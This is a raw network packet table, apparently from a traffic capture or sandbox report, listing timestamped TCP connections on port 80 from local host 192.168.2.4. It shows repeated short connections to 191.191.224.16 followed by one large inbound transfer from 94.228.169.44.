Sep 1, 2024 18:27:30.492875099 CEST	56149	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:30.495281935 CEST	80	56148	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:30.497654915 CEST	80	56149	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:30.497729063 CEST	56149	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:30.497847080 CEST	56149	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:30.497860909 CEST	56149	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:30.502662897 CEST	80	56149	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:30.502707005 CEST	80	56149	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:31.874779940 CEST	80	56149	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:31.874799967 CEST	80	56149	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:31.874809980 CEST	80	56149	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:31.874870062 CEST	56149	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:31.874897957 CEST	56149	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:31.876871109 CEST	56149	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:31.881699085 CEST	80	56149	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:31.966548920 CEST	56150	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:31.971666098 CEST	80	56150	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:31.971726894 CEST	56150	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:31.971863985 CEST	56150	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:31.971873999 CEST	56150	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:31.976730108 CEST	80	56150	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:31.976746082 CEST	80	56150	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:33.231990099 CEST	80	56150	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:33.232779026 CEST	80	56150	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:33.232836008 CEST	56150	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:33.232872963 CEST	56150	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:33.235048056 CEST	56151	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:33.237710953 CEST	80	56150	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:33.239830971 CEST	80	56151	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:33.239892006 CEST	56151	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:33.240026951 CEST	56151	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:33.240045071 CEST	56151	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:33.246031046 CEST	80	56151	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:33.246040106 CEST	80	56151	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:34.494791985 CEST	80	56151	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:34.494853973 CEST	80	56151	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:34.494901896 CEST	56151	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:34.508620024 CEST	56151	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:34.516021967 CEST	80	56151	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:34.529310942 CEST	56152	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:34.534302950 CEST	80	56152	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:34.534362078 CEST	56152	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:34.534480095 CEST	56152	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:34.534503937 CEST	56152	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:34.539232969 CEST	80	56152	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:34.539439917 CEST	80	56152	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:36.056380987 CEST	80	56152	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:36.056977034 CEST	80	56152	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:36.057038069 CEST	56152	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:36.057074070 CEST	56152	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:36.059340954 CEST	56153	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:36.061877966 CEST	80	56152	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:36.064110041 CEST	80	56153	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:36.064168930 CEST	56153	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:36.064263105 CEST	56153	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:36.064275026 CEST	56153	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:36.069310904 CEST	80	56153	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:36.069319963 CEST	80	56153	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:37.409102917 CEST	80	56153	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:37.409126997 CEST	80	56153	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:37.409138918 CEST	80	56153	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:37.409194946 CEST	56153	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:37.409387112 CEST	56153	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:37.412034988 CEST	56154	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:37.414248943 CEST	80	56153	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:37.416764975 CEST	80	56154	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:37.416824102 CEST	56154	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:37.417047977 CEST	56154	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:37.417062044 CEST	56154	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:37.421828985 CEST	80	56154	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:37.421906948 CEST	80	56154	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:38.657624006 CEST	80	56154	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:38.658179045 CEST	80	56154	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:38.658236027 CEST	56154	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:38.658282042 CEST	56154	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:38.661082983 CEST	56155	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:38.663256884 CEST	80	56154	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:38.667527914 CEST	80	56155	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:38.667604923 CEST	56155	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:38.667730093 CEST	56155	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:38.667751074 CEST	56155	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:38.672571898 CEST	80	56155	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:38.672723055 CEST	80	56155	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:39.922529936 CEST	80	56155	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:39.922976971 CEST	80	56155	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:39.923038006 CEST	56155	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:39.923075914 CEST	56155	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:39.925419092 CEST	56156	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:39.927937984 CEST	80	56155	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:39.930197001 CEST	80	56156	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:39.930270910 CEST	56156	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:39.930432081 CEST	56156	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:39.930464983 CEST	56156	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:39.935219049 CEST	80	56156	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:39.935408115 CEST	80	56156	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:41.273844004 CEST	80	56156	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:41.273875952 CEST	80	56156	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:41.273886919 CEST	80	56156	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:41.274010897 CEST	56156	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:41.274199009 CEST	56156	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:41.274199009 CEST	56156	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:41.276829958 CEST	56157	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:41.278949022 CEST	80	56156	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:41.281622887 CEST	80	56157	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:41.281698942 CEST	56157	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:41.281825066 CEST	56157	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:41.281848907 CEST	56157	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:41.286551952 CEST	80	56157	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:41.286639929 CEST	80	56157	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:42.526227951 CEST	80	56157	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:42.526653051 CEST	80	56157	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:42.526719093 CEST	56157	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:42.526751995 CEST	56157	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:42.529254913 CEST	56158	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:42.531538010 CEST	80	56157	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:42.534317970 CEST	80	56158	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:42.534389019 CEST	56158	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:42.534487963 CEST	56158	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:42.534513950 CEST	56158	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:42.539259911 CEST	80	56158	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:42.539364100 CEST	80	56158	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:43.794398069 CEST	80	56158	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:43.794939041 CEST	80	56158	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:43.796524048 CEST	56158	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:43.796734095 CEST	56158	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:43.799880981 CEST	56159	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:43.801976919 CEST	80	56158	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:43.805963039 CEST	80	56159	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:43.806771994 CEST	56159	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:43.806938887 CEST	56159	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:43.806972027 CEST	56159	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:43.811810017 CEST	80	56159	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:43.811858892 CEST	80	56159	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:45.058583975 CEST	80	56159	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:45.059133053 CEST	80	56159	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:45.059196949 CEST	56159	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:45.059242010 CEST	56159	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:45.061316013 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:45.064095974 CEST	80	56159	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:45.066210985 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.066287041 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:45.066401005 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:45.071165085 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.710235119 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.710254908 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.710263968 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.710364103 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.710375071 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.710386038 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.710397959 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.710412979 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.710412979 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:45.710443974 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:45.710485935 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:45.710714102 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.710725069 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.710764885 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:45.715323925 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.715400934 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.715430975 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.715466022 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:45.804193020 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.804207087 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.804265022 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:45.810607910 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.810662985 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.810718060 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:45.817739964 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.817756891 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.817780018 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.817797899 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:45.823724985 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.823774099 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:45.823779106 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.830301046 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.830341101 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.830342054 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:45.836715937 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.836733103 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.836760044 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:45.836807013 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.836848974 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:45.843570948 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.843635082 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.843679905 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:45.849966049 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.850022078 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.850078106 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:45.856668949 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.856703997 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.856756926 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:45.863034010 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.863071918 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.863111019 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:45.898045063 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.898088932 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.898277044 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:45.902230024 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.902304888 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.902354002 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:45.911772013 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.911941051 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.911989927 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:45.919207096 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.919313908 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.919358969 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:45.921597958 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.922476053 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.922530890 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:45.929655075 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.932374001 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.932383060 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.932429075 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:45.934603930 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.934627056 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.934664011 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:45.940728903 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.940778971 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.940784931 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:45.947218895 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.947228909 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.947263002 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.947285891 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:45.947324991 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:45.953413010 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.953500986 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.953558922 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:45.959124088 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.959175110 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.959232092 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:45.964339972 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.964391947 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.964442968 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:45.969758034 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.969799042 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.969851971 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:45.975500107 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.975591898 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.975637913 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:45.980668068 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.980747938 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.980806112 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:45.985780954 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.985816002 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.985857010 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:45.985867977 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.991146088 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.991184950 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:45.991206884 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.996457100 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.996520042 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:45.996530056 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.999476910 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:45.999521017 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:45.999547005 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.003185987 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.003232002 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.003257036 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.005678892 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.005723953 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.005728006 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.009166002 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.009238005 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.009280920 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.011965036 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.012010098 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.012052059 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.015156031 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.015202999 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.015207052 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.018131018 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.018181086 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.018184900 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.021256924 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.021266937 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.021276951 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.021307945 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.021334887 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.024342060 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.024353027 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.024401903 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.027420998 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.027472019 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.027518988 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.030772924 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.030863047 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.030909061 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.033503056 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.033556938 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.033596992 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.033600092 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.037122965 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.037169933 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.037195921 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.039855003 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.039899111 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.039901018 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.044861078 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.044877052 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.044902086 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.051229954 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.051278114 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.051317930 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.056400061 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.056432009 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.056446075 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.056489944 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.056530952 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.057215929 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.057317019 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.057359934 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.057389021 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.057440042 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.057473898 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.058132887 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.058171988 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.058213949 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.061346054 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.061527014 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.061568022 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.064232111 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.064244032 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.064254045 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.064281940 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.076678038 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.076715946 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.076726913 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.076742887 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.076756954 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.076878071 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.077003002 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.077044964 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.077052116 CEST	80	56160	94.228.169.44	192.168.2.4
